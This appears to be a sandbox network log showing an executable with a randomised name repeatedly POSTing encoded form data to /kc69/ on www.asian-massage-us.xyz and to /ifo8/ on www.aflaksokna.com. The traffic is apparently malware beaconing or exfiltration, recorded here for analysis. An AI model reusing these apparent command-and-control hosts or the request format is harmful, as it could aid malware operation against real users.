                        Sep 3, 2024 10:44:36.279951096 CEST | 1236 | IN | Data Raw: 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38
                        Data Ascii: th class="st2" d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        13 | 192.168.2.4 | 64991 | 199.59.243.226 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:41.478301048 CEST | 736 | OUT | POST /kc69/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.asian-massage-us.xyz
                        Origin: http://www.asian-massage-us.xyz
                        Referer: http://www.asian-massage-us.xyz/kc69/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2b 43 68 30 6d 4f 64 71 70 36 63 48 54 6b 46 66 7a 57 36 69 6d 30 78 6a 73 67 47 6c 44 32 50 79 46 2b 75 4b 59 6d 74 73 5a 52 31 78 2f 6d 64 2b 71 46 48 6d 56 31 2f 68 48 6d 5a 38 76 4d 54 54 2f 4c 4b 61 62 6a 2b 64 51 62 7a 42 6a 66 6d 34 4d 32 6a 59 35 34 77 38 58 48 52 36 62 33 77 79 77 61 30 75 6f 2b 37 6f 38 4b 4b 39 65 35 48 47 68 61 63 39 56 37 76 68 30 51 44 4a 79 2b 45 52 5a 73 32 59 31 63 54 6b 66 45 34 66 38 42 41 64 43 6b 77 5a 48 61 5a 62 35 62 76 34 50 6b 33 78 2b 51 68 50 62 58 2f 2b 4a 57 35 77 45 34 56 76 74 56 42 6e 63 51 3d 3d
                        Data Ascii: Qd=AkBl0xNSGkvk+Ch0mOdqp6cHTkFfzW6im0xjsgGlD2PyF+uKYmtsZR1x/md+qFHmV1/hHmZ8vMTT/LKabj+dQbzBjfm4M2jY54w8XHR6b3wywa0uo+7o8KK9e5HGhac9V7vh0QDJy+ERZs2Y1cTkfE4f8BAdCkwZHaZb5bv4Pk3x+QhPbX/+JW5wE4VvtVBncQ==
                        Sep 3, 2024 10:44:41.933306932 CEST | 1236 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:44:41 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1146
                        x-request-id: 35096c67-caa9-4160-a3e7-d2b3c59cc9e9
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                        set-cookie: parking_session=35096c67-caa9-4160-a3e7-d2b3c59cc9e9; expires=Tue, 03 Sep 2024 08:59:41 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:44:41.933324099 CEST | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzUwOTZjNjctY2FhOS00MTYwLWEzZTctZDJiM2M1OWNjOWU5IiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        14 | 192.168.2.4 | 64992 | 199.59.243.226 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:44.020411968 CEST | 756 | OUT | POST /kc69/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.asian-massage-us.xyz
                        Origin: http://www.asian-massage-us.xyz
                        Referer: http://www.asian-massage-us.xyz/kc69/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 72 79 46 62 4b 4b 5a 6e 74 73 63 52 31 78 74 47 64 6e 6b 6c 48 78 56 31 7a 70 48 6b 64 38 76 4d 48 54 2f 4b 36 61 62 77 57 65 54 72 7a 44 72 2f 6d 41 43 57 6a 59 35 34 77 38 58 48 31 41 62 33 49 79 77 71 6b 75 70 66 37 72 30 71 4b 2b 4f 5a 48 47 72 36 63 6d 56 37 76 66 30 52 4f 55 79 34 41 52 5a 70 4b 59 31 4a 2f 6e 55 45 35 31 78 68 42 54 53 46 52 4a 4b 66 73 55 30 4b 48 68 47 6b 75 52 2f 57 77 56 4b 6d 65 70 62 57 64 44 5a 2f 63 62 67 57 38 75 48 61 4e 57 7a 62 4f 5a 59 70 71 34 4f 6c 6f 35 52 33 58 59 36 62 67 3d
                        Data Ascii: Qd=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFryFbKKZntscR1xtGdnklHxV1zpHkd8vMHT/K6abwWeTrzDr/mACWjY54w8XH1Ab3Iywqkupf7r0qK+OZHGr6cmV7vf0ROUy4ARZpKY1J/nUE51xhBTSFRJKfsU0KHhGkuR/WwVKmepbWdDZ/cbgW8uHaNWzbOZYpq4Olo5R3XY6bg=
                        Sep 3, 2024 10:44:44.455370903 CEST | 1236 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:44:43 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1146
                        x-request-id: 0c5a446b-4dea-4ada-9f23-b8b7038d8b9f
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                        set-cookie: parking_session=0c5a446b-4dea-4ada-9f23-b8b7038d8b9f; expires=Tue, 03 Sep 2024 08:59:44 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:44:44.455391884 CEST | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGM1YTQ0NmItNGRlYS00YWRhLTlmMjMtYjhiNzAzOGQ4YjlmIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        15 | 192.168.2.4 | 64993 | 199.59.243.226 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:46.582942963 CEST | 10838 | OUT | POST /kc69/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.asian-massage-us.xyz
                        Origin: http://www.asian-massage-us.xyz
                        Referer: http://www.asian-massage-us.xyz/kc69/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 41 6b 42 6c 30 78 4e 53 47 6b 76 6b 2f 69 52 30 6e 74 31 71 2b 4b 63 49 50 30 46 66 6f 6d 36 6d 6d 30 31 6a 73 69 71 31 44 46 6a 79 45 74 47 4b 59 45 31 73 66 52 31 78 75 47 64 36 6b 6c 48 4a 56 30 62 74 48 6b 52 47 76 4b 44 54 2f 70 69 61 4b 52 57 65 49 62 7a 44 6e 66 6d 37 4d 32 69 41 35 34 67 67 58 48 46 41 62 33 49 79 77 76 67 75 75 4f 37 72 32 71 4b 39 65 35 48 53 68 61 64 6f 56 37 32 6e 30 52 62 6a 7a 4c 49 52 59 4a 36 59 34 66 72 6e 5a 45 34 54 69 52 41 4f 53 46 63 54 4b 5a 49 32 30 4b 44 62 47 6d 79 52 39 79 5a 33 51 30 4b 2b 66 56 74 39 48 63 77 6a 6f 32 77 33 43 39 4e 31 7a 36 61 2f 4a 61 43 70 49 45 4a 31 42 6c 4c 4e 6c 2b 65 44 51 4a 48 38 6c 63 63 61 42 75 79 50 35 54 4e 47 78 50 47 42 42 6e 42 41 44 55 55 55 37 73 37 61 59 2b 31 38 4e 72 33 7a 66 50 49 4c 59 41 76 77 38 63 58 43 58 37 61 4c 76 4f 4d 6f 4a 55 44 64 4c 56 37 6b 4f 77 5a 67 6d 4a 43 4d 30 6e 6e 6f 33 78 4c 70 66 70 6e 66 7a 57 63 33 57 2b 34 43 5a 66 2b 32 59 54 52 67 75 63 58 6a 70 39 57 4c 75 4b 78 4a 6d 46 31 [TRUNCATED]
                        Data Ascii: Qd=AkBl0xNSGkvk/iR0nt1q+KcIP0Ffom6mm01jsiq1DFjyEtGKYE1sfR1xuGd6klHJV0btHkRGvKDT/piaKRWeIbzDnfm7M2iA54ggXHFAb3IywvguuO7r2qK9e5HShadoV72n0RbjzLIRYJ6Y4frnZE4TiRAOSFcTKZI20KDbGmyR9yZ3Q0K+fVt9Hcwjo2w3C9N1z6a/JaCpIEJ1BlLNl+eDQJH8lccaBuyP5TNGxPGBBnBADUUU7s7aY+18Nr3zfPILYAvw8cXCX7aLvOMoJUDdLV7kOwZgmJCM0nno3xLpfpnfzWc3W+4CZf+2YTRgucXjp9WLuKxJmF1BatN1VKrR6A1BekBK2kCG4HOVb2ryhc4r78ZFYX4AwZ8tg6ud9FcFl8tSQ7MdFJ7FeOdKa3mHc3CUNw1voRXAMg8SrwFxz6K5g8d5OvTY5XbtMZnxaJ5c/1l5kuoiPV67bBig6QJJJMScmdUqJ5F/a0+SuU94T8CtKS2UXEzPhuBCU5LW/XRFzbfwsRfiK8LvCrR6bluYGXQMxdqtQi/OxJ0o+gcw/ZMaxrGubDGwW78RvxCCIDVi5JffZIR3JPDI3kzChI+L2XqGP3gKuddlqsWmZ/xYhuFwCkzBJv+gj1x/R5dQZL7psbxwB396mZ8WueC1w4d9l/xD6NCjLd6MgjfjEJodMPu4LzIc/S2ctTAM/1+KaMZPrvkKN3eqxsW/MOKOC4AotrFFrQruJhuMwDYHBofP7b2QZlop+NEsFqtHd/MNX1RRZbtNSA/yPTgLAGNhK4sXLkZQUQG+hH4sKSKIFiNeRCFI24a8W4RcpRsSxZKiZkS+3LrH/RckHbe88ZBqaas7Hk4grUFfAsn0bb4QyIbec6/gEI1mwVMdMcdl1c+/INWN/yRsZmHvUjs83kDfsODoNX7aVXh+lB/R1Ay2acqyIpUZNW7B/jCZgc9ImcwjPVXcxN+jQ/ZgowSjTVFSy5IcdGIQ0WDCcajQKWRR4P0yQQPMu [TRUNCATED]
                        Sep 3, 2024 10:44:47.032680988 CEST | 1236 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:44:46 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1146
                        x-request-id: 888a238a-76e4-487f-894b-f6891e0ead03
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==
                        set-cookie: parking_session=888a238a-76e4-487f-894b-f6891e0ead03; expires=Tue, 03 Sep 2024 08:59:46 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 77 6c 41 52 4a 68 71 4c 6d 6d 57 56 48 38 62 2f 47 44 49 68 77 7a 4a 7a 64 6e 34 35 6b 66 74 33 6b 36 4f 65 2f 47 75 32 2f 41 4c 62 6d 32 38 66 32 4c 59 73 72 44 4e 75 50 68 66 30 74 35 66 34 39 39 75 47 30 44 50 5a 55 4a 73 6f 43 49 79 30 4d 68 6a 5a 50 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_wlARJhqLmmWVH8b/GDIhwzJzdn45kft3k6Oe/Gu2/ALbm28f2LYsrDNuPhf0t5f499uG0DPZUJsoCIy0MhjZPw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:44:47.032713890 CEST | 599 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiODg4YTIzOGEtNzZlNC00ODdmLTg5NGItZjY4OTFlMGVhZDAzIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        16 | 192.168.2.4 | 64994 | 199.59.243.226 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:44:49.123464108 CEST | 450 | OUT | GET /kc69/?Qd=NmpF3EhDDWuD2jtxofhf+uMKfjRAnSqtmyJn51mvGwf0ZsSxS3FqZkMY4E4Bhni9ZRnQKXdCwf/FxLiQBiKGPfCZkMeDDDW6mIEhSXgEQREY6q1xuM7O6IY=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.asian-massage-us.xyz
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:44:49.740858078 CEST | 1236 | IN | HTTP/1.1 200 OK
                        date: Tue, 03 Sep 2024 08:44:49 GMT
                        content-type: text/html; charset=utf-8
                        content-length: 1458
                        x-request-id: aa664475-8b2f-4827-a97c-81a61b080132
                        cache-control: no-store, max-age=0
                        accept-ch: sec-ch-prefers-color-scheme
                        critical-ch: sec-ch-prefers-color-scheme
                        vary: sec-ch-prefers-color-scheme
                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ieSIiqzE/FTrCRiHd1MKSZ8ffHjMyq3d7b7Mkbk+0NdLgGkLANDihZBqGqxBJTbzC7mYBfeKiEvzg+x5pZenDw==
                        set-cookie: parking_session=aa664475-8b2f-4827-a97c-81a61b080132; expires=Tue, 03 Sep 2024 08:59:49 GMT; path=/
                        connection: close
                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 65 53 49 69 71 7a 45 2f 46 54 72 43 52 69 48 64 31 4d 4b 53 5a 38 66 66 48 6a 4d 79 71 33 64 37 62 37 4d 6b 62 6b 2b 30 4e 64 4c 67 47 6b 4c 41 4e 44 69 68 5a 42 71 47 71 78 42 4a 54 62 7a 43 37 6d 59 42 66 65 4b 69 45 76 7a 67 2b 78 35 70 5a 65 6e 44 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_ieSIiqzE/FTrCRiHd1MKSZ8ffHjMyq3d7b7Mkbk+0NdLgGkLANDihZBqGqxBJTbzC7mYBfeKiEvzg+x5pZenDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                        Sep 3, 2024 10:44:49.740905046 CEST | 911 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                        Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYWE2NjQ0NzUtOGIyZi00ODI3LWE5N2MtODFhNjFiMDgwMTMyIiwicGFnZV90aW1lIjoxNzI1MzUzMD


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        17 | 192.168.2.4 | 64995 | 5.144.130.52 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:45:02.977329969 CEST | 718 | OUT | POST /ifo8/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.aflaksokna.com
                        Origin: http://www.aflaksokna.com
                        Referer: http://www.aflaksokna.com/ifo8/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 37 57 67 70 66 49 44 34 6f 46 59 35 44 74 68 68 78 39 59 6e 76 50 43 53 54 59 6b 6f 44 31 35 7a 45 57 6d 43 79 65 63 50 57 51 74 65 48 63 65 46 7a 74 30 51 64 71 45 73 49 48 74 62 57 38 72 64 70 76 35 4c 67 30 41 47 63 63 38 71 47 47 4d 75 52 68 77 39 69 65 79 4e 53 30 66 47 2f 57 57 4a 55 33 54 47 38 4c 58 53 76 4c 74 50 58 49 39 59 68 44 42 48 7a 69 64 44 36 4f 49 65 45 37 4a 41 48 36 4a 32 4d 54 41 58 75 39 46 61 46 4a 78 36 55 33 52 56 38 70 45 70 35 69 31 66 4b 70 63 2f 51 67 77 37 77 58 41 2f 7a 41 30 70 70 30 57 59 2b 71 42 72 6c 36 45 36 74 65 36 7a 75 46 74 51 5a 77 3d 3d
